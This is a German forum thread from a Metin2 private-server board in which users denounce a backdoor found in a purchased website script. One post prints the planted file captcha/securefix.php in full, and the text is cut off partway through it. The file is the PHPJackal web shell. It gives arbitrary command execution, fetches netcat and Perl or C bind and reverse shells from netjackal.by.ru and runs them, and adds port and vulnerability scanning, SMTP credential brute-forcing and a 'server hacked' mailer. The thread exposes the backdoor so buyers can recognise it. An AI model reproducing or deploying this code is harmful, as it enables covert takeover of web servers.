Register for your free account! | Forgot your password?

Go Back   elitepvpers > Popular Games > Metin2 > Metin2 Private Server
[HowTo]Backdoor in Script von CADesign entfernen [HowTo]Backdoor in Script von CADesign entfernen
You last visited: Today at 18:16

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement


Advertise with us!

[HowTo]Backdoor in Script von CADesign entfernen

Discussion on [HowTo]Backdoor in Script von CADesign entfernen within the Metin2 Private Server forum part of the Metin2 category.

Reply
Page 6 of 6 « First 45 6
 
Old 08/20/2012, 13:25   #76
 
elite*gold: 0
The Black Market: 0/0/0
Join Date: May 2012
Posts: 85
Received Thanks: 31
Ich füg auch so ausversehn ein backdoor script ein wers glaubt wird seelisch
[SA]TheMario is offline  
Old 08/20/2012, 17:17   #77
 
.Keyto's Avatar
 
elite*gold: 1250
The Black Market: 54/0/0
Join Date: Oct 2010
Posts: 3,599
Received Thanks: 5,526
Quote:
Originally Posted by Ap0kalyps3 View Post
Wenn es nur das wäre ( back ) könnte man auch einfach nen paar Zeilen backdoor schreiben, mit dem man die komplette Page eiens Copyrightentferners löschen kann bzw. durch eine "Ich habe etwas getan, was ich nicht tun hätte sollen" Seite ersetzen...

Da brauch man nicht direkt ein Script als backdoor verstecken, mit dem man vollzugriff auf alles was man will bekommen kann.

Sowas ist assozial. Sorry, but its the truth.
Mein Post war auch ironisch und nicht ernst gemeint.
.Keyto is offline  
Old 08/20/2012, 18:05   #78

 
Aze /..'s Avatar
 
elite*gold: 220
The Black Market: 41/0/0
Join Date: Oct 2011
Posts: 7,369
Received Thanks: 7,610
Thja, am besten mal scriptet sowas selber, dann hat man das Problem nicht :> Und Php + Html und CSS ist nicht schwer.
Aze /.. is offline  
Thanks
1 User
Old 08/20/2012, 18:20   #79
 
elite*gold: 0
The Black Market: 1/0/0
Join Date: Jul 2012
Posts: 58
Received Thanks: 60
Ich kaufe ne Homepage für 150€ mit nem Backdoor drinne und dann wird mein ganzer Server gelöscht. Du assi!
.Dazee is offline  
Old 08/20/2012, 20:28   #80
 
.RUVision's Avatar
 
elite*gold: 34
The Black Market: 3/0/0
Join Date: Nov 2011
Posts: 1,431
Received Thanks: 851
Quote:
Originally Posted by [SA]TheMario View Post
Kauft nicht bei ihm, wir haben eine Homepage für 150€ Gekauft,

Als ich mir die Files Angeschaut hab, war im ordner Captcha/securefix.php drinnen.

Das is Tatsächlich ein Backdoor script.

Aza gehört gebannd und verhauen!
Code:
#--Config--#
$login_password= ''; //Set password
#----------#
error_reporting(E_ALL);
set_time_limit(0);
ini_set("max_execution_time","0");
ini_set("memory_limit","9999M");
set_magic_quotes_runtime(0);
if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS;
if(!isset($_POST))$_POST = &$HTTP_POST_VARS;
if(!isset($_GET))$_GET = &$HTTP_GET_VARS;
if(!isset($_COOKIE))$_COOKIE=$HTTP_COOKIE_VARS;
$_REQUEST = array_merge($_GET, $_POST);
if (get_magic_quotes_gpc()){
foreach ($_REQUEST as $key=>$value)
{
$_REQUEST[$key]=stripslashes($value);
}
}
function hlinK($str=""){
$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');
$ret=$_SERVER['PHP_SELF']."?";
$new=explode("&",$str);
foreach ($_GET as $key => $v){
$add=1;
foreach($new as $m){
$el = explode("=", $m);
if ($el[0]==$key)$add=0;
}
if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
}
$ret.=$str;
return $ret;
}
if(!empty($login_password)){
if(!empty($_REQUEST['fpassw'])){
if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw']));
@header("Location: ".hlinK());
}
if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></td></tr></form></table></body></html>");
}
if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']);
function checkthisporT($ip,$port,$timeout,$type=0){
if(!$type){
$scan=@fsockopen($ip,$port,$n,$s,$timeout);
if($scan){fclose($scan);return 1;}
}
elseif(function_exists('socket_set_timeout')){
$scan=@fsockopen("udp://".$ip,$port);
if($scan){
socket_set_timeout($scan,$timeout);
@fwrite($scan,"\x00");
$s=time();
fread($scan,1);
if((time()-$s)>=$timeout){fclose($scan);return 1;}
}
}
return 0;
}
if (!function_exists("file_get_contents")){
function file_get_contents($addr){
$a = fopen($addr,"r");
$tmp = fread($a,filesize($a));
fclose($a);
if($a)return $tmp;
}
}
if (!function_exists("file_put_contents")){
function file_put_contents($addr,$con){
$a = fopen($addr,"w");
if(!$a)return 0;
fwrite($a,$con);
fclose($a);
return strlen($con);
}
}
function flusheR(){
flush();@ob_flush();
}
if (!empty($_REQUEST['downloaD'])){
@ob_clean();
$dl=$_REQUEST['downloaD'];
$con=file_get_contents($dl);
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=\"$dl\";");
header("Content-length: ".strlen($con));
echo $con;
exit;
}
if (!empty($_REQUEST['imagE'])){
$img=$_REQUEST['imagE'];
header("Content-type: imagE/gif");
header("Content-length: ".filesize($img));
header("Last-Modified: ".date("r",filemtime($img)));
echo file_get_contents($img);
exit;
}
@header("Cache-Control: no-cache, must-revalidate");
@header("Expires: Mon, 7 Aug 1987 05:00:00 GMT");
function showsizE($size){
if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
elseif ($size>=1024)$size = round(($size/1024),2)." KB";
else $size .= " B";
return $size;
}
if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;
$errorbox = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td><b>Error: </b>";
$et = "</td></tr></table>";
$v="1.5";
$msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td align=\"center\">";
$intro="<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\"><tr><td bgcolor=\"#666666\"><b>Script:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href=\"http://netjackal.by.ru\" target=\"_blank\">http://netjackal.by.ru</a><br><b>Email:</b> <a href=\"mailto:?subject=PHPJackal\"></a><br></font>$et</center>";
$footer="${msgbox}PHPJackal v$v - Powered By <a href=\"http://netjackal.by.ru\" target=\"_blank\">NetJackal</a>$et";
$hcwd="<input type=hidden name=workingdiR value=\"".getcwd()."\">";
$t = "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">";
$crack="</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
function namE(){
$name='';
srand((double)microtime()*100000);
for ($i=0;$i<=rand(3,10);$i++){
$name.=chr(rand(97,122));
}
return $name;
}
function whereistmP(){
$uploadtmp=ini_get('upload_tmp_dir');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return ".";
}
function shelL($command){
global $windows,$disablefunctions;
$exec = '';$output= '';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
return $exec;
}
function downloadiT($get,$put){
$fo=@strtolower(ini_get('allow_url_fopen'));
if($fo || $fo=='on')$con=file_get_contents($get);
else{
$u=parse_url($get);
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
$url=fsockopen($host, 80, $en, $es, 12);
fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
$tmp=$con='';
while($tmp!="\r\n")$tmp=fgets($url);
while(!feof($url))$con.=fgets($url);
}
$mk=file_put_contents($put,$con);
if($mk)return 1;
return 0;
}
function smtplogiN($addr,$user,$pass,$timeout){
$sock=fsockopen($addr,25,$n,$s,$timeout);
if(!$sock)return -1;
fread($sock,1024);
fputs($sock,'ehlo '.namE()."\r\n");
$res=substr(fgets($sock,512),0,1);
if($res!='2')return 0;
fgets($sock,512);fgets($sock,512);fgets($sock,512);
fputs($sock,"AUTH LOGIN\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='334')return 0;
fputs($sock,base64_encode($user)."\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='334')return 0;
fputs($sock,base64_encode($pass)."\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='235')return 0;
return 1;
}
function checksmtP($host,$timeout){
$from=strtolower(namE())."@".strtolower(namE()).".com";
$sock=@fsockopen($host,25,$n,$s,$timeout);
if(!$sock)return -1;
$res=substr(fgets($sock,512),0,3);
if($res!='220')return 0;
fputs($sock,'HELO '.namE()."\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='250')return 0;
fputs($sock,"MAIL FROM: <$from>\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='250')return 0;
fputs($sock,"RCPT TO: <>\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='250')return 0;
fputs($sock,"DATA\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='354')return 0;
fputs($sock,"From: ".namE()." ".namE()." <$from>\r\nSubject: ".namE()."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".namE().namE().namE()."\r\n.\r\n");
$res=substr(fgets($sock,512),0,3);
if($res!='250')return 0;
return 1;
}
function check_urL($url,$method,$search,$timeout){
if(empty($search))$search='200';
$u=parse_url($url);
$method=strtoupper($method);
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
$data=(!empty($u['query']))?$u['query']:'';
if(!empty($data))$data="?$data";
$sock=@fsockopen($host,80,$en,$es,$timeout);
if($sock){
fputs($sock,"$method $file$data HTTP/1.0\r\n");
fputs($sock,"Host: $host\r\n");
if($method=='GET')fputs($sock,"\r\n");
elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
else return 0;
if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;}
while(!feof($sock)){
$res=trim(fgets($sock));
if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
}
fclose($sock);
}
return 0;
}
function get_sw_namE($host,$timeout){
$sock=@fsockopen($host,80,$en,$es,$timeout);
if($sock){
$page=namE().namE();
fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
while(!feof($sock)){
$con=fgets($sock);
if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
}
fclose($sock);
return -1;
}return 0;
}
function snmpchecK($ip,$com,$timeout){
$res=0;
$n=chr(0x00);
$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). 
$com. chr(0xA0). 
chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n.
chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C).
chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01).
chr(0x01). chr(0x01). $n. chr(0x05). $n;
$sock=@fsockopen("udp://$ip",161);
socket_set_timeout($sock,$timeout);
@fputs($sock,$packet);
socket_set_timeout($sock,$timeout);
$res=fgets($sock);
fclose($sock);
return $res;
}

$safemode=(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on')?'ON':'OFF';
if($safemode=="ON"){@ini_restore("safe_mode");@ini_restore("open_basedir");}
$disablefunctions = @ini_get('disable_functions');
if (!function_exists("str_repeat")){
function str_repeat($str,$c){
$r="";
for($i=0; $i < $cu; $i++)$r.=$str;
return $r;
}
}

function brshelL(){
global $errorbox, $windows,$et,$hcwd;
$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
$addr='http://netjackal.by.ru/backdoor';
$error="$errorbox Can not make backdoor file, go to writeable folder.$et";
$n=namE();
if(!$windows)$n=".$n";
$d=whereistmP();
$name=$d.DIRECTORY_SEPARATOR.$n;
$perl=(!$windows && shelL('which perl'))?$perl=shelL('which perl'):'perl';
$c=($_REQUEST['C'])?1:0;
if (!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1) ){
$port=(int)$_REQUEST['port'];
if($windows){
if($c){
$name.=".exe";
$bd=downloadiT("$addr/nc.exe",$name);
shelL("attrib +H $name");
if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");
}else{
$name = $name.".pl";
$bd=downloadiT("$addr/winbind.pl",$name);
shelL("attrib +H $name");
if(!$bd)echo $error;else shelL("perl.exe $name $port");
}
}
else{
if($c){
$bd=downloadiT("$addr/bind.c",$name);
if (!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");
}else{
$bd=downloadiT("$addr/bind.pl",$name);
if (!$bd)echo $error; else shelL("cd $d;$perl $n $port &");
echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>";
}
}
}
elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){
$ip=$_REQUEST['ip'];
$port=(int)$_REQUEST['rport'];
if($windows){
if($c){
$name.='.exe';
$bd=downloadiT("$addr/nc.exe",$name);
shelL("attrib +H $name");
if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");
}else{
$name = $name.".pl";
$bd=downloadiT("$addr/winrc.pl",$name);
shelL("attrib +H $name");
if (!$bd)echo $error; else shelL("perl.exe $name $ip $port");
}
}
else{
if($c){
$bd=downloadiT("$addr/rc.c",$name);
if(!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
}else{
$bd=downloadiT("$addr/rc.pl",$name);
if(!$bd)echo $error;else shelL("cd $d;$perl $n $ip $port &");
}
}
echo "<font color=blue>Done!</font>";}
else{echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"50%\" bgcolor=\"#333333\">Bind shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=port value=55501 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input type=submit class=buttons value=Bind></td></tr></form></table></td><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"40%\" bgcolor=\"#333333\">Reverse shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#808080\">IP:</td><td bgcolor=\"#808080\"><input type=text name=ip value=";echo $_SERVER["REMOTE_ADDR"]; echo " size=17></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=rport value=53 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Connect></td></tr></form></table>$et";}}
function showimagE($img){
echo "<center><img border=0 src=\"".hlinK("imagE=$img&&workingdiR=".getcwd())."\"></center>";}
function editoR($file){
global $errorbox,$et,$hcwd;
if (is_file($file)){
if (!is_readable($file)){echo "$errorbox File is not readable$et<br>";}
if (!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";}
$data = file_get_contents($file);
echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\">$hcwd<input type=text value=\"".htmlspecialchars($file)."\" size=75 name=file><input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"64\">";
echo htmlspecialchars($data);
echo "</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"$file\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">";
}
else {echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\"><input type=text value=\"".getcwd()."\" size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"63\"></textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"".getcwd()."\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">";
}
echo "$hcwd<input type=submit class=buttons name=Save value=Save></td></form></tr></table></center>";
}
function webshelL(){
global $windows,$hcwd;
if($windows){
$alias="<option value=\"netstat -an\">Display open ports</option><option value=\"tasklist\">List of processes</option><option value=\"systeminfo\">System information</option><option value=\"ipconfig /all\">IP configuration</option><option value=\"getmac\">Get MAC address</option><option value=\"net start\">Services list</option><option value=\"net view\">Machines in domain</option><option value=\"net user\">Users list</option><option value=\"gpresult\">Group policy</option><option value=\"shutdown -s -f -t 1\">Turn off the server</option>";
}
else{
$alias="<option value=\"netstat -an | grep -i listen\">Display open ports</option><option value=\"last -a -n 250 -i\">Show last 250 logged in users</option><option value=\"which wget curl lynx w3m\">Downloaders</option><option value=\"find / -perm -2 -type d -print\">Find world-writable directories</option><option value=\"find . -perm -2 -type d -print\">Find world-writable directories(in current directory)</option><option value=\"find / -perm -2 -type f -print\">Find world-writable files</option><option value=\"find . -perm -2 -type f -print\">Find world-writable files(in current directory)</option><option value=\"find / -type f -perm 04000 -ls\">Find files with SUID bit set</option><option value=\"find / -type f -perm 02000 -ls\">Find files with SGID bit set</option><option value=\"find / -name .htpasswd -type f\">Find .htpasswd files</option><option value=\"find / -type f -name .bash_history\">Find .bash_history files</option><option value=\"cat /etc/syslog.conf\">View syslog.conf</option><option value=\"cat cat /etc/hosts\">View hosts</option><option value=\"ps auxw\">List of processes</option>";
if(is_dir('/etc/valiases'))$alias.="<option value=\"ls -l /etc/valiases\">List of Cpanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value=\"ls -l /etc/vdomainaliases\">List Cpanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value=\"cat /var/cpanel/accounting.log\">Display Cpanel`s log</option>";
if(is_dir('/var/spool/mail/'))$alias.="<option value=\"ls /var/spool/mail/\">Mailboxes list</option>";
}
echo "<center><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=82 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><tr><td><b>Web Shell:</b></td></tr><td bgcolor=\"#666666\"><textarea rows=\"22\" cols=\"78\">";
if (!empty($_REQUEST['cmd'])) echo shelL($_REQUEST['cmd']);
echo"</textarea></td></tr><form method=post><tr><td bgcolor=\"#808080\"><input type=text size=91 name=cmd value=\"";if (!empty($_REQUEST['cmd'])) echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows) echo "cat /etc/passwd";echo "\">$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor=\"#808080\"><select name=\"cmd\" width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></table><center>";
}
function maileR(){
global $msgbox,$et,$hcwd;
$cwd= getcwd();
if (!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){
$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];
if (!mail($to,$subject,$body,"From: $from"))break;
echo "$msgbox<b>Mail sent!</b><br>$et";
}
echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td><b>Mailer:</b></td></tr><td width=\"20%\" bgcolor=\"#666666\">SMTP</td><td bgcolor=\"#666666\">".ini_get('SMTP')." (".ini_get('smtp_port').")</td></tr><tr><td bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\"><input name=from type=text value=\"\" size=55>$hcwd</td><tr><td width=\"25%\" bgcolor=\"#666666\">To:</td><td bgcolor=\"#666666\"><input name=to type=text value=\""; if (!empty($_REQUEST['to'])) echo htmlspecialchars($_REQUEST['to']); elseif(!empty($_ENV["SERVER_ADMIN"])) echo $_ENV["SERVER_ADMIN"];else echo "admin@".getenv('HTTP_HOST'); echo "\" size=55></td></tr><tr><td bgcolor=\"#808080\">Subject:</td><td bgcolor=\"#808080\"><input name=subject type=text value=\"YOUR SERVER HAS BEED HACKED :-P\" size=55></td><tr><td bgcolor=\"#666666\">Body:</td><td bgcolor=\"#666666\"><textarea rows=\"18\" cols=\"43\" name=body>Admin, your system has been hacked! if you don`t seCure it, next time i`ll format your box.</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=\"right\"><input type=submit class=buttons value=Send></form>$et";
}
function scanneR(){
global $hcwd;
if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1";
$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
$target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0;
echo "<font color=blue>Port scanning started against ".htmlspecialchars($target).":<br>";
$start=time();
for($i=$from;$i<=$to;$i++){
if($tcp){
if (checkthisporT($target,$i,$timeout)){
$nu++;
$ser="";
if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")";
echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>";
}
}
if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";}
flusheR();
}
$time=time()-$start;
echo "Done! ($time seconds)</font>";
}
elseif (!empty($_REQUEST['securityscanner'])){
echo "<font color=blue>";
$start=time();
$from=$_REQUEST['from'];
$to=(int)$_REQUEST['to'];
$timeout=(int)$_REQUEST['timeout'];
$f = substr($from,strrpos($from,".")+1);
$from = substr($from,0,strrpos($from,"."));
if(!empty($_REQUEST['httpscanner'])){
echo "Loading webserver bug list...";
flusheR();
$buglist=whereistmP().DIRECTORY_SEPARATOR.namE();
$dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>";
flusheR();
}else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";}
for($i=$f;$i<=$to;$i++){
$output=0;
$ip="$from.$i";
if(!empty($_REQUEST['nslookup'])){
$hn=gethostbyaddr($ip);
if($hn!=$ip)echo "$ip [$hn]<br>";}
flusheR();
if(!empty($_REQUEST['ipscanner'])){
$port=$_REQUEST['port'];
if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port;
$open=$ser="";
foreach($p as $po){
$scan=checkthisporT($ip,$po,$timeout);
if ($scan){
$ser="";
if($ser=getservbyport($po,"tcp"))$ser="($ser)";
$open.=" $po$ser ";
}
}
if($open){echo "$ip) Open ports:$open<br>";$output=1;}
flusheR();
}
if(!empty($_REQUEST['httpbanner'])){
$res=get_sw_namE($ip,$timeout);
if($res){
echo "$ip) Webserver software: ";
if($res==-1)echo "Unknow";
else echo $res;
echo "<br>";
$output=1;
}
flusheR();
}
if(!empty($_REQUEST['httpscanner'])){
if(checkthisporT($ip,80,$timeout) && !empty($file)){
$admin=array('/admin/','/adm/');
$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
foreach ($file as $v){
$vuln=array();
$v=trim($v);
if(!$v || $v{0}=='#')continue;
$v=str_replace('","','^',$v);
$v=str_replace('"','',$v);
$vuln=explode('^',$v);
$page=$cqich=$nukech=$adminch=$userch=$vuln[1];
if(strstr($page,'@CGIDIRS'))
foreach($cgi as $cg){
$cqich=str_replace('@CGIDIRS',$cg,$page);
$url="http://$ip$cqich";
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
flusheR();
}
elseif(strstr($page,'@ADMINDIRS'))
foreach ($admin as $cg){
$adminch=str_replace('@ADMINDIRS',$cg,$page);
$url="http://$ip$adminch";
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
flusheR();
}
elseif(strstr($page,'@USERS'))
foreach ($users as $cg){
$userch=str_replace('@USERS',$cg,$page);
$url="http://$ip$userch";
